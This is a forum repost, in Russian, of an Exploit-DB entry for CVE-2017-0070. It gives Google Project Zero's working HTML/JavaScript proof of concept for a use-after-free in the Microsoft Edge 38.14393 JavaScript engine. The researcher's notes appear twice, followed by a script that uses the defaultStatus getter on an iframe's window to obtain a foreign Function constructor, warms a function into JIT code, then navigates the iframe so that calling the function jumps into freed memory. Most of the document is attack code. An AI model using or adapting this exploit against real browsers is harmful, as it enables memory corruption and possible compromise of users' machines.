Exploit Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
41623
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2017-0070
Дата публикации
2017-03-16
Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free
HTML:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043

I noticed that some javascript getters behave strangely.

My test code:

var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];

var f = document.createElement("iframe");

f.onload = () => {
    f.onload = null;

    for (var x in window) {
        if (whitelist.indexOf(x) != -1)
            continue;

        try {
            window.__lookupGetter__(x).call(f.contentWindow);
            log(x);
        } catch (e) {

        }
    }

};

f.src = "https://abc.xyz/";
document.body.appendChild(f);

And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.

Tested on Microsoft Edge 38.14393.0.0.
-->

<!--

Microsoft Edge: Undefined behavior on some getters

I noticed that some javascript getters behave strangely.

My test code:

var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];

var f = document.createElement("iframe");

f.onload = () => {
    f.onload = null;

    for (var x in window) {
        if (whitelist.indexOf(x) != -1)
            continue;

        try {
            window.__lookupGetter__(x).call(f.contentWindow);
            log(x);
        } catch (e) {

        }
    }

};

f.src = "https://abc.xyz/";
document.body.appendChild(f);

And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.

Tested on Microsoft Edge 38.14393.0.0.

-->


<pre id="d">
</pre>
<body></body>

<script>

function log(txt) {
    var c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
}

function main() {
    var f = document.createElement("iframe");
    
    f.onload = () => {
        f.onload = () => {
            var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
            var func_cons = status.constructor.constructor;

            var ff = func_cons("return 0x12345;");
            for (var i = 0; i < 0x100000; i++)
                ff();

            f.onload = () => {
                alert("get ready");
                ff();
            };

            f.src = "about:blank";
        };

        //a = f.contentWindow;
        f.src = "about:blank";
    };

    document.body.appendChild(f);
}

main();

</script>
 
Источник
www.exploit-db.com

Похожие темы